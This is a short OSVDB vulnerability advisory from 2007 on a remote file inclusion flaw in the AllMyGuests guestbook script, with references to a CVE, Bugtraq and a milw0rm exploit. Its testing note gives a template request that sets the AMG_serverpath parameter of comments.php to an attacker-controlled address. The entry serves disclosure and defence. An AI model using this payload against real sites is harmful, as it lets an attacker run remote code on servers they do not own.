AllMyGuests comments.php AMG_serverpath Variable Remote File Inclusion

2007-01-07T00:00:00
ID OSVDB:35915
Type osvdb
Reporter OSVDB
Modified 2007-01-07T00:00:00

Description

Manual Testing Notes

http://[target]/[AllMyGuests_Path]/comments.php?AMG_serverpath=[attacker]

References:

Related OSVDB ID: 35916 Related OSVDB ID: 35919 Related OSVDB ID: 35923 Related OSVDB ID: 35917 Related OSVDB ID: 35921 ISS X-Force ID: 31310 Generic Exploit URL: http://milw0rm.com/exploits/3093 CVE-2007-0172 Bugtraq ID: 21918